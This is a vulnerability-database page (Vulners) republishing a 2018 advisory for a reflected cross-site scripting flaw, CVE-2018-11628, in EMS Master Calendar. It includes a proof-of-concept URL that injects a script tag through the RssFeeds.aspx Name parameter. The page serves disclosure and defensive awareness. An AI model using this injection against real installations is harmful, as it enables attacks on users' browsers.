Vulners
Lucene search
EMS Master Calendar Cross Site Scripting
🗓️ 05 Jun 2018 00:00:00Reported by Chris BarrettoType 
packetstorm🔗 packetstormsecurity.com👁 54 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting Vulnerability | 4 Jun 201800:00 | – | zdt |
 | EMS Master Calendar Cross-Site Scripting Vulnerability | 27 Jun 201800:00 | – | cnvd |
 | CVE-2018-11628 | 1 Jun 201815:00 | – | cve |
 | CVE-2018-11628 | 1 Jun 201815:00 | – | cvelist |
 | EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting | 4 Jun 201800:00 | – | exploitdb |
 | EUVD-2018-3651 | 7 Oct 202500:30 | – | euvd |
 | EMS Master Calendar 8.0.0.20180520 - Cross-Site Scripting | 4 Jun 201800:00 | – | exploitpack |
 | CVE-2018-11628 | 1 Jun 201815:29 | – | nvd |
 | Cross site scripting | 1 Jun 201815:29 | – | prion |
`# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
# Date: 2018-06-01
# Exploit Author: Chris Barretto
# Vendor Homepage: https://www.emssoftware.com/
# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm
# Version: Versions prior to 8.0.0.201805210 are vulnerable
# Tested on: Master Calendar v8.0.0.127
# CVE : CVE-2018-11628
# 1. Description:
# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters are not properly sanitized,
# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser.
#2. Proof of concept:
# The following PoC URL is available:
https://example.com/MasterCalendar/RssFeeds.aspx?Name=abc<script>alert('XSS')</script>xyz
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jun 2018 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.02271